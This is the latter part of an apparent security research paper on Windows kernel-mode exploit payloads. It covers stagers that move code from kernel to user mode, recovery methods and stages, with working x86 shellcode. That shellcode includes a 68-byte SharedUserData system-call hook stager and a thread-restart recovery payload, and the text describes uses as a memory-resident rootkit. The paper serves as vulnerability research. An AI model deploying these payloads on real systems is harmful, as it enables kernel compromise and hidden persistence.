Although most stagers involve reading more code in off the wire, it
could also be possible to write an egghunt style stager that searches
the address space for an egg that is prepended or appended to the code
that should be executed.  The only requirement would be that there be
some way to get the second stage somewhere in the address space for a
long enough period of time.  Given the right conditions, this approach
for staging can be quite useful because it reduces the size of the
initial payload that has to be transmitted or included as part of the
exploitation request.

4.2.1) System Call Return Address Overwrite


A potentially useful way to stage code to R3 would be to hook the system
call MSR and then alter the return address of the R3 stack to point to
the stage that is to be executed.  This would mean that whenever a
system call occurred, the return path would bounce through the stage and
then into the actual return address.  This is an interesting vantage
point for stages because it could give them the ability to filter data
that is passed back to actual processes.  This could be potentially make
it possible for an attacker to install a very simple memory-resident
root-kit as a result of taking advantage of a vulnerability.  This
approach is purely theoretical, but it is thought that it could be made
to work without very much overhead.

The basic implementation for such a stager would be to first copy the
staged payload to a globally accessible location, such as
SharedUserData.  Once copied, the next step would be to hook the
processor MSR for the system call instruction.  The hook routine for the
system call instruction would then alter the return address of the
user-mode stack when called to point to the stage's global address and
should also make it so the stage can restore execution to the actual
return address after it has completed.  Once the return address has been
redirected, the actual system call can be issued. When the system call
returns, it would execute the stage.  The stage, once completed, would
then restore registers, such as eax, and transfer control to the actual
return address.

This approach would be very transparent and should be completely
reliable.  The added benefits of being able to filter system call
results make it very interesting from a memory-resident rootkit
perspective.

4.2.2)  Thread APC


One of the most logical ways to go about staging a payload from R0 to R3
is through the use of Asynchronous Procedure Calls (APCs).  The purpose
of an APC is to allow code to be executed in the context of an existing
thread without disrupting the normal course of execution for the thread.
As such, it happens to be very useful for R0 payloads that want to run
an R3 payload.  This is the technique that was discussed at length in
the eEye's paper.  A few steps are required to accomplish this.

First, the R3 payload must be copied to a location that will be
accessible from a user-mode process, such as SharedUserData.  After the
copy has completed, the next step is to locate the thread that the APC
should be queued to. There are a few important things to keep in mind in
this step.  For instance, it is likely the case that the R3 payload will
want to be run in the context of a privileged process.  As such, a
privileged process must first be located and a thread running within it
must be found.  Secondly, the thread that will have the APC queued to it
must be in the alertable state, otherwise the APC insertion will fail.

Once a suitable thread has been located, the final step is to initialize
the APC and point the APC routine to the user-mode equivalent address
via nt!KeInitializeApc and insert it into the thread's APC queue via
nt!KeInsertQueueApc.  After that has completed, the code will be run in
the context of the thread that the APC was queued to and all will be
well.

One of the major concerns about this type of approach is that it will
generally have to rely on undocumented offsets for fields in structures
like EPROCESS and ETHREAD that are very volatile across operating system
versions.  As such, making a portable payload that uses this technique
is perfectly feasible, but it may come at the cost of size due to the
requirement of factoring in different offsets and detecting the version
at runtime.

The approach outlined by eEye works perfectly fine and is well thought
out, and as such this subsection will merely describe ways in which it
might be possible to improve the existing implementation. One way in
which it might be optimized would be to eliminate the call to
nt!PsLookupProcessByProcessId, but as their paper points out, this would
only be possible for vulnerabilities that are triggered outside of the
context of the Idle process. However, for cases where this is not a
limitation, it would be easier to extract the current thread's process
from .  This can be accomplished through the following disassembly This
may not be safe if the KPRCB is not located immediately after the KPCR:


00000000  A124F1DFFF        mov eax,[0xffdff124]
00000005  8B4044            mov eax,[eax+0x44]


After the process has been extracted, enumeration to find a privileged
system process could be done in exactly the same manner as the paper
describes (by enumerating the ActiveProcessLinks).

Another improvement that might be made would be to use SharedUserData as
a storage location for the initialized KAPC structure rather than
allocating storage for it with nt!ExAllocatePool.  This would save some
space by eliminating the need to resolve and call nt!ExAllocatePool.
While the approach outlined in the paper describes nt!ExAllocatePool as
being used to stage the payload to an IRQL safe buffer, it would be
equally feasible to do so by using nt!SharedUserData for storage.

4.2.3) User-mode Function Pointer Hook


If a vulnerability is triggered in the context of a process then the
doors open up to a whole wide array of possibilities.  For instance, the
FastPebLockRoutine could be hooked to call into some code that is
present in SharedUserData prior to calling the real lock routine.  This
is just one example of the different types of function pointers that
could be hooked relative to a process.

4.2.4) SharedUserData SystemCall Hook


  +------------+-----------------+
  | Type:      | R0 to R3 Stager |
  | Size:      | 68 bytes        |
  | Compat:    | XP, 2003        |
  | Migration: | Not necessary   |
  +------------+-----------------+


One particularly useful approach to staging a R3 payload from R0 is to
hijack the system call dispatcher at R3. To accomplish this, one must
have an understanding of the basic mechanism through which system calls
are dispatched in user-mode. Prior to Windows XP, system calls were
dispatched through the soft-interrupt 0x2e.  As such, the method
described in this subsection will not work on Windows 2000.  However,
starting with XP SP0, the system call interface was changed to support
using processor-specific instructions for system calls, such as sysenter
or syscall.

To support this, Microsoft added fields to the KUSER_SHARED_DATA
structure, which is symbolically known as SharedUserData, that held
instructions for issuing a system call.  These instructions were placed
at offset 0x300 by the kernel and took a form like the code shown below:


kd> dt _KUSER_SHARED_DATA 0x7ffe0000
...
+0x300 SystemCall       : [4] 0xc819cc3`340fd48b
kd> u SharedUserData!SystemCallStub L3
SharedUserData!SystemCallStub:
7ffe0300 8bd4             mov     edx,esp
7ffe0302 0f34             sysenter
7ffe0304 c3               ret


To make use of this dynamic code block, each system call stub in
ntdll.dll was implemented to make a call into the instructions found at
that location.


ntdll!ZwAllocateVirtualMemory:
77f7e4c3 b811000000       mov     eax,0x11
77f7e4c8 ba0003fe7f       mov     edx,0x7ffe0300
77f7e4cd ffd2             call    edx


Due to the fact that SharedUserData contained executable instructions,
it was thus necessary that the SharedUserData mapping had to be marked
as executable. When Microsoft began work on some of the security
enhancements included with XP SP2 and 2003 SP1, such as Data Execution
Prevention (DEP), they presumably realized that leaving SharedUserData
executable was largely unnecessary and that doing so left open the
possibility for abuse.  To address this, the fields in KUSER_SHARED_DATA
were changed from sets of instructions to function pointers that resided
within ntdll.dll. The output below shows this change:


   +0x300 SystemCall       : 0x7c90eb8b
   +0x304 SystemCallReturn : 0x7c90eb94
   +0x308 SystemCallPad    : [3] 0


To make use of the function pointers, each system call stub was changed to
issue an indirect call through the SystemCall function pointer:


ntdll!ZwAllocateVirtualMemory:
7c90d4de b811000000       mov     eax,0x11
7c90d4e3 ba0003fe7f       mov     edx,0x7ffe0300
7c90d4e8 ff12             call    dword ptr [edx]


The importance behind the approaches taken to issue system calls is that it is
possible to take advantage of the way in which the system call dispatching
interfaces have been implemented.  These interfaces can be manipulated in a
manner that allows a payload to be staged from R0 to R3 with very little
overhead.  The basic idea behind this approach is that a R3 payload is layered
in between the system call stubs and the kernel. The R3 payload then gets an
opportunity to run prior to a system call being issued within the context of an
arbitrary process.

This approach has quite a few advantages.  First, the size of the staging
payload is relatively small because it requires no symbol resolution or other
means of directly scheduling the execution of code in an arbitrary or specific
process.  Second, the staging mechanism is inherently IRQL-safe because
SharedUserData cannot be paged out.  This benefit makes it such that a
migration technique does not have to be employed in order to get the R0 payload
to a safe IRQL.

One of the disadvantages of the payload outlined below is that it relies on
SharedUserData being executable.  However, it should be trivial to alter the
PTE for SharedUserData to set the execute bit if necessary, thus eliminating
the DEP concern.

Another thing to keep in mind about this stager is that the R3 payload must be
written in a manner that allows it to be re-entrant.  Since the R3 payload is
layered between user-mode and kernel-mode for system call dispatching, it can
be assumed that the payload will get called many times in many different
process contexts.  It is up to the R3 payload to figure out when it should do
its magic and when it should not.

The following steps outline one way in which a stager of this type could be
implemented.


1. Obtain the address of the R3 payload


In order to prepare to copy the R3 payload to SharedUserData (or some other
globally-accessible region), the address of the R3 payload must be determined
in some arbitrary manner.

2. Copy the R3 payload to the global region


After obtaining the address of the R3 payload, the next step would be to copy
it to a globally accessible region.  One such region would be in
SharedUserData.  This requires that SharedUserData be executable.

3. Determine OS version


The method used to layer between system call stubs and the kernel differs
between XP SP0/SP1 and XP SP2/2003 SP1.  To determine whether or not the
machine is XP SP0/SP1, a comparison can be made to see if the first two bytes
found at 0xffdf0300 are equal to 0xd48b (which is equivalent to a mov edx, esp
instruction).  If they are equal, then the operating system is assumed to be XP
SP0/SP1.  Otherwise, it is assumed to be XP SP2+.

4. Hooking on XP SP0/SP1


If the operating system version is XP SP0/SP1, hooking is accomplished by
overwriting the first two bytes at 0xffdf0300 with a short jump instruction to
some offset within SharedUserData that is not used, such as 0xffdf037c.  Prior
to doing this overwrite, a few instructions must be appended to the copied R3
payload that act as a method of restoring execution so that the original system
call actually executes.  This is accomplished by appending a mov edx, esp / mov
ecx, 0x7ffe0302 / jmp ecx instruction set.

5. Hooking on XP SP2+


If the operating system version is XP SP2, hooking is accomplished by
overwriting the function pointer found at offset 0x300 within SharedUserData.
Prior to overwriting the function pointer, the original function pointer must
be saved and an indirect jmp instruction must be appended to the copied R3
payload so that system calls can still be processed.  The original function
pointer can be saved to 0xffdf0308 which is currently defined as being used for
padding.  The jmp instruction can therefore indirectly acquire the original
system call dispatcher address from 0x7ffe0308.


The following code illustrates an implementation of this type of staging
payload.  It's roughly 68 bytes in size, excluding the R3 payload and the
recovery method.


00000000  EB3F              jmp short 0x41
00000002  BB0103DFFF        mov ebx,0xffdf0301
00000007  4B                dec ebx
00000008  FC                cld
00000009  8D7B7C            lea edi,[ebx+0x7c]
0000000C  5E                pop esi
0000000D  57                push edi
0000000E  6A01              push byte +0x1 ; number of dwords to copy
00000010  59                pop ecx
00000011  F3A5              rep movsd
00000013  B88BD4B902        mov eax,0x2b9d48b
00000018  663903            cmp [ebx],ax
0000001B  7511              jnz 0x2e
0000001D  AB                stosd
0000001E  B803FE7FFF        mov eax,0xff7ffe03
00000023  AB                stosd
00000024  B0E1              mov al,0xe1
00000026  AA                stosb
00000027  66C703EB7A        mov word [ebx],0x7aeb
0000002C  5F                pop edi
0000002D  C3                ret ; substitute with recovery method
0000002E  8B03              mov eax,[ebx]
00000030  8D4B08            lea ecx,[ebx+0x8]
00000033  8901              mov [ecx],eax
00000035  66C707FF25        mov word [edi],0x25ff
0000003A  894F02            mov [edi+0x2],ecx
0000003D  5F                pop edi
0000003E  893B              mov [ebx],edi
00000040  C3                ret ; substitute with recovery method
00000041  E8BCFFFFFF        call 0x2

... R3 payload here ...

4.3) Recovery


Another distinction between kernel-mode vulnerabilities and user-mode
vulnerabilities is that it is not safe to simply let the kernel crash.  If the
kernel crashes, the box will blue screen and the payload that was transmitted
may not even get a chance to run.  As such, it is necessary to identify ways in
which normal execution can be resumed after a kernel-mode vulnerability has
been triggered.  However, like most things in the kernel, the recovery method
that can be used is highly dependent on the vulnerability in question, so it
makes sense to have a few possible approaches.  Chances are, though, that the
methods listed in this document will not be enough to satisfy every situation
and in many cases may not even be the most optimal.  For this reason,
kernel-mode exploit writers are encouraged to research more specific recovery
methods when implementing an exploit.  Regardless of these concerns, this
section describes the general class of recovery payloads and identifies
scenarios in which they may be most useful.

4.3.1)  Thread Spinning


For situations where a vulnerability occurs in a non-critical kernel thread, it
may be possible to simply cause the thread to spin or block indefinitely.  This
approach is very useful because it means that there is no requirement to
gracefully restore execution in some manner. It basically skirts the issue of
recovery altogether.

4.3.1.1) Delaying Thread Execution


This method was proposed by eEye and involved using nt!KeDelayExecutionThread
as a way of blocking the calling thread without adversely impacting
performance.  Alternatively, if nt!KeDelayExecutionThread failed or returned,
eEye implemented their payload in such a way as to cause it to spin while
calling nt!KeYieldExecution each iteration.  The approach that eEye suggests is
perfectly fine, assuming the following minimum conditions are true:


  - Non-critical kernel thread
  - No exclusive locks (such as spin locks) are held by a calling frame


If any one of these conditions is not true, the act of spinning or otherwise
blocking the thread from continuing normal execution could lead to a deadlock.
If the setting is right, though, this method is perfectly acceptable.  If the
approach described by eEye is used, it will require the resolution of
nt!KeDelayExecutionThread at a minimum, but could also require the resolution
of nt!KeYieldExecution depending on how robust the recovery method is intended
to be.  The fact that this requires symbol resolution means that the payload
will jump significantly in size if it does not already involve the resolution
of symbols.

4.3.1.2) Spinning the Calling Thread


  +---------------+--------------------+
  | Type:         | R0 Recovery        |
  | Size:         | 2 bytes            |
  | Compat:       | All                |
  | Migration:    | May be required    |
  | Requirements: | No held locks      |
  +---------------+--------------------+

An alternative approach is to just spin the calling thread at PASSIVE_LEVEL.
If the conditions are right, this should not lead to a deadlock, but it is
likely that performance will be adversely affected.  The benefit is that it
does not increase the size of the payload by much considering such an approach
can be implemented in two bytes:


00000000  EBFE              jmp short 0x0


4.3.2)  Throwing an Exception


  +---------------+---------------------------------+
  | Type:         | R0 Recovery                     |
  | Size:         | 3 bytes                         |
  | Compat:       | All                             |
  | Migration:    | Not necessary                   |
  | Requirements: | No held locks in wrapped frame  |
  +---------------+---------------------------------+


If a vulnerability occurs in the context of a frame that is wrapped in an
exception handler, it may be possible to simply trigger an exception that will
allow execution to continue like normal.  Unfortunately, the chances of this
recovery method being usable are very slim considering most vulnerabilities are
likely to occur outside of the context of an exception wrapped frame.  The
usability of this approach can be tested fairly simply by triggering the
overflow in such a way as to cause an exception to be thrown.  If the machine
does not crash, it could be the case that the vulnerability occurred in a
function that is wrapped by an exception handler.  Assuming this is the case,
writing a payload that simply triggers an exception is fairly trivial.


00000000  31F6              xor esi,esi
00000002  AC                lodsb


4.3.3) Thread Restart


  +---------------+---------------------+
  | Type:         | R0 Recovery         |
  | Size:         | 41 bytes            |
  | Compat:       | 2000, XP            |
  | Migration:    | May be required     |
  | Requirements: | No held locks       |
  +---------------+---------------------+


If a vulnerability occurs in the context of a system worker thread, it may be
possible to cause the thread to restart execution at its entry point without
any major adverse side effects.  This avoids the issue of having to restore
normal execution for the context of the current call frame.  To accomplish
this, the StartAddress must be extracted from the calling thread's ETHREAD
structure.  Due to the fact that this relies on the use of undocumented fields,
it follows that portability could be a problem.  The following table shows the
offsets to the StartAddress routine for different operating system versions:


  +------------------+---------------------+----------------------+
  | Platform         | StartAddress Offset | Stack Restore Offset |
  +------------------+---------------------+----------------------+
  | Windows 2000 SP4 | 0x230               | 0x254                |
  | Windows XP SP0   | 0x224               | 0x250                |
  | Windows XP SP2   | 0x224               | 0x250                |
  +------------------+---------------------+----------------------+


A payload that implements this approach that should be compatible with all of
the above described offsets is shown below.  Testing was only performed on XP
SP0:


00000000  6A24              push byte +0x24
00000002  5B                pop ebx
00000003  FEC7              inc bh
00000005  648B13            mov edx,[fs:ebx]
00000008  FEC7              inc bh
0000000A  8B6218            mov esp,[edx+0x18]
0000000D  29DC              sub esp,ebx
0000000F  01D3              add ebx,edx
00000011  803D7002DFFF01    cmp byte [0xffdf0270],0x1
00000018  7C07              jl 0x21
0000001A  8B03              mov eax,[ebx]
0000001C  83EC2C            sub esp,byte +0x2c
0000001F  EB06              jmp short 0x27
00000021  8B430C            mov eax,[ebx+0xc]
00000024  83EC30            sub esp,byte +0x30
00000027  FFE0              jmp eax


This implementation works by first obtaining the current thread context through
fs:0x124.  Once obtained, a check is performed to see which operating system
the payload is running on by looking at the NtMinorVersion attribute of the
KUSER_SHARED_DATA structure.  The reason this is necessary is because the
offsets needed to obtain the StartAddress of the thread and the offset that is
needed when restoring the stack are different depending on which operating
system is being used.  After resolving the StartAddress and adjusting the stack
pointer to reflect what it would have been when the function was originally
called, all that's required is to transfer control to the StartAddress.

This approach, at least in this specific implementation, may be closely tied to
vulnerabilities that occur in system worker thread routines, specifically those
that start at nt!ExpWorkerThread.  However, the principals could be applied to
other system worker threads if the illustrated implementation proves limited.
It is also important to realize that since this method depends on undocumented
version-specific offsets, it is highly likely that it may not be portable to
new versions of the kernel.  This approach should also be compatible with
Windows 2003 Server SP0/SP1, but the offsets are likely to be different and
have not been obtained or tested at this point.

4.3.4) Lock Release


Judging from some of the other recovery methods described in this document, it
can be seen that one of the biggest limiting factors has to do with locks being
held when recovery is attempted.  To deal with this problem, one would have to
implement a solution that was capable of releasing held locks prior to using a
recovery method.  This is more of a theoretical solution than a concrete one,
but if it were possible to release locks held by a thread prior to recovery,
then it would be possible to use some of the more elegant recovery methods.  As
it stands, though, the authors are not aware of a feasible solution to this
problem that is capable of releasing the various types of locks in a general
manner.  Instead, it would most likely be better to attack this problem on a
per-vulnerability basis rather than attempting to come up with an
all-encompassing solution.

Without a proper lock releasing solution, it is likely that even if a
vulnerability can be triggered, the box may deadlock. Again, this is highly
dependent on the vulnerability in question, but it's not something that should
be considered an academic concern.

4.4) Stages


The purpose of the stage payload component is to perform whatever arbitrary
task is desired, whether it be to hook the keyboard and send key strokes to the
attacker or to spawn a reverse shell in the context of a user-mode process.
The definition of the stage component is very broad as to encompass pretty much
any end-goal an attacker might have.  For that reason, this section is
relatively sparse on details and is instead left up to the reader to decide
what type of action they would like to perform.  The paper eEye has provided
shows some concrete examples of kernel-mode stages.  There are also many
examples of existing user-mode payloads that could be staged to run in the
context of a user-mode process.  In the future, stages will most likely be the
focal point of kernel-mode payload research.

5) Conclusion


This document has illustrated some of the general techniques that can be used
when implementing kernel-mode payloads.  Examples have been provided for
techniques that can be used to locate the base address of nt and an example
routine has been provided to illustrate symbol resolution.  To make kernel-mode
payloads easier to grasp, their anatomy has been broken down into four distinct
units that have been referred to as payload components.  These four payload
components can be combined together to form a logical kernel-mode payload.

The purpose of the migration payload component is to transition the processor
to a safe IRQL so that the rest of the payload can be executed.  In some cases,
it's also necessary to make use of a stager payload component in order to move
the payload to another thread context or location for the purpose of execution.
Once the payload is at a safe IRQL and has been staged as necessary, the actual
meat of the payload can be run.  This portion of the payload is symbolically
referred to as the stage payload component.  After everything is said and done,
the kernel-mode payload has to find some way to ensure that the kernel does not
crash.  To accomplish this, a situational recovery payload component can be
used to allow the kernel to continue to execute properly.

While the vectors taken to achieve code execution have not been described in
this document, it is expected that there will continue to be research and
improvements in this field.  A cycle similar to that seen for user-mode
vulnerabilities can be equally expected in the kernel-mode arena once enough
interest is gained.  With the eye of security vendors intently focused on
solving the problem of user-mode software vulnerabilities, the kernel-mode
arena will be a playground ripe for research and discovery.


Bibliography

Conover, Matt.  Malware Profiling and Rootkit Detection on
Windows.
http://xcon.xfocus.org/archives/2005/Xcon2005_Shok.pdf;
accessed Dec. 12, 2005.


eEye Digital Security.  Remote Windows Kernel Exploitation:
Step into the Ring 0.
http://www.eeye.com/ data/publish/whitepapers/research/OT20050205.FILE.pdf;
accessed Dec. 8, 2005.


skape.  Safely Searching Process Virtual Address Space.
http://www.hick.org/code/skape/papers/egghunt-shellcode.pdf;
accessed Dec. 12, 2005.


SoBeIt.  How to Exploit Windows Kernel Memory Pool.
http://packetstormsecurity.nl/Xcon2005/Xcon2005_SoBeIt.pdf;
accessed Dec. 11, 2005.


System Inside.  Sysenter.
http://system-inside.com/driver/sysenter/sysenter.html;
accessed Nov. 23, 2005.